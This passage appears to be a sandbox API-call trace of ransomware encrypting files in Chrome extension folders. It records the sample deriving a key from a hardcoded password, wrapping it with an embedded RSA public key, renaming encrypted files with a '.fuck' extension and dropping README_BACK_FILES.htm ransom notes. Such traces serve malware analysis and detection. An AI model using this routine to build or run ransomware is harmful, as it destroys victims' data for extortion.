lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.342] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.343] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.343] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.344] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.344] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.344] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.344] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.344] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0256.344] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0256.344] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x1d4, lpOverlapped=0x0) returned 1 [0256.344] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1d4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1e0) returned 1 [0256.344] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x1e0, lpOverlapped=0x0) returned 1 [0256.344] CloseHandle (hObject=0x5d5c) returned 1 [0256.344] CloseHandle (hObject=0x5d50) returned 1 [0256.345] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0256.348] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0256.349] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0256.350] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0256.352] CryptDestroyHash (hHash=0x2e18828) returned 1 [0256.352] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.352] CryptReleaseContext (hProv=0x2e172e8, dwFlags=0x0) returned 1 [0256.352] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0256.352] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0256.352] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0256.352] AreFileApisANSI () returned 1 [0256.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0256.352] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.353] GetFileType (hFile=0x5d64) returned 0x1 [0256.353] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0256.355] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0256.355] FindClose (in: hFindFile=0x28e7df8 | out: hFindFile=0x28e7df8) returned 1 [0256.355] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\readme_back_files.htm")) returned 0xffffffff [0256.355] AreFileApisANSI () returned 1 [0256.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1e040, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0256.355] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0256.361] GetFileType (hFile=0x5d4c) returned 0x1 [0256.362] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0256.363] FindNextFileA (in: hFindFile=0x28e8078, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0256.363] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e18828 [0256.390] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.390] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.391] GetLastError () returned 0x0 [0256.391] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png")) returned 0x20 [0256.392] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png", dwFileAttributes=0x80) returned 1 [0256.392] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.393] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.394] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg", dwFileAttributes=0x2) returned 1 [0256.394] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e14180) returned 1 [0256.397] CryptCreateHash (in: hProv=0x2e14180, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.397] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.397] CryptHashData (hHash=0x2e186a8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.397] CryptDeriveKey (in: hProv=0x2e14180, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e18128) returned 1 [0256.397] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.397] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.397] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e14208) returned 1 [0256.398] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14208, dwCertEncodingType=0x1, pInfo=0x2e28f90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28fc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28fc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e19128) returned 1 [0256.398] CryptEncrypt (in: hKey=0x2e19128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.398] CryptEncrypt (in: hKey=0x2e19128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13fe8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e13fe8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e13fe8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e13fe8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.458] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.459] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.467] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.467] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.467] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.467] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.468] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.468] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.468] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.468] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1f8, lpOverlapped=0x0) returned 1 [0256.468] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1f8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x200) returned 1 [0256.468] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x200, lpOverlapped=0x0) returned 1 [0256.468] CloseHandle (hObject=0x5d64) returned 1 [0256.468] CloseHandle (hObject=0x5d50) returned 1 [0256.468] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png"), bFailIfExists=0) returned 1 [0256.471] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png", dwFileAttributes=0x0) returned 1 [0256.472] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.gsg")) returned 1 [0256.473] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\128.png.fuck")) returned 1 [0256.474] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0256.475] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.475] CryptReleaseContext (hProv=0x2e14180, dwFlags=0x0) returned 1 [0256.475] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.475] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.475] GetLastError () returned 0x0 [0256.475] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 